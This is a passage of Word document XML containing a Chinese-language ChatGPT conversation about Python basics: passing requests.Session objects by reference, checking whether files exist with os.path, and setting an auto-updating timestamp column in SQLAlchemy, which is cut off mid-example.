    <w:p w14:paraId="3863AAD7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629DC46F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5985B75B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，传递对象（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requests.Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）作为函数参数时，传递的是对象的引用，而不是值的拷贝。这意味着，如果你在函数中修改了这个对象（例如，通过调用其方法或修改其属性），那么这些更改将在函数外部的对象上反映出来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D80083" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E98955A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里有一个简单的示例来说明这一点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA68FF5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EDAA5C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AD44BD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20330524" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605900EE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def modify_session(session):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518595E8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    session.headers.update({'x-test-header': 'test value'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD4D142" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B6C7AA3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>s = requests.Session()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA998C0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>modify_session(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64560046" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52556774" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print(s.headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316EA7CE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D285B6E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，我们定义了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>modify_session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，它接受一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，并更新它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。然后我们创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并传递给这个函数。当我们打印</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，可以看到它们已经被更新，这说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>modify_session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中的更改在函数外部的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象上反映出来了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104883C0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F308BC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，如果你在函数中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requests.session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，并计划在函数外部继续使用它，你应该注意任何在函数内部对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的修改，因为这些修改将影响函数外部的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA2DFAD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396BBF59" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何判断某文件是否存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75988874" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B7C326" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC67021" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，你可以使用内置的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> os </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.exists </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法来判断文件是否存在。以下是一个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC88E69" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B0C259D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BDF35" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7EF906" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1824564A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if os.path.exists('path_to_your_file'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450F1924" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F44661F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0EB09E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049A72E5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34367855" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这段代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">os.path.exists </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法返回一个布尔值，如果指定的文件或者目录存在，则返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，否则返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。你需要将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'path_to_your_file' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换为你要检查的文件的路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B3371D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E560C07" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此外，如果你只想检查特定的文件（不包括目录），你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.isfile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46186719" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3137FBFB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCA941D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A104C3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4079B6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if os.path.isfile('path_to_your_file'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8A4942" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D29327C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208279CB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488723CF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0375857C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样地，你需要将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'path_to_your_file' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换为你要检查的文件的路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C927F30" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D71E906" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B37A79" w14:textId="3C74F3A8" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="600" w:name="_Toc159780033"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为</w:t>
      </w:r>
      <w:bookmarkEnd w:id="600"/>
    </w:p>
    <w:p w14:paraId="06CE8946" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E8E8BE3" w14:textId="086E3406" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9952E3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中如何实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`update_time` DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建、更改时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0DBCFD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4017E650" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FEB71F0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLAlchemy ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlalchemy.sql.func.now()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现在每次数据行被更新时更新时间戳。同时可以在定义字段时使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数设置默认值。这样可以模拟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367EED17" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5A4A39" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DE2F65" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ECD027E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E57C95" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from sqlalchemy import Column, Integer, DateTime, func</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E92DAF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="238A45FA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class MyTable(Base):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB5287" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    __tablename__ = 'my_table'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6989BC30" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640571A6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    id = Column(Integer, primary_key=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE5E2F1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
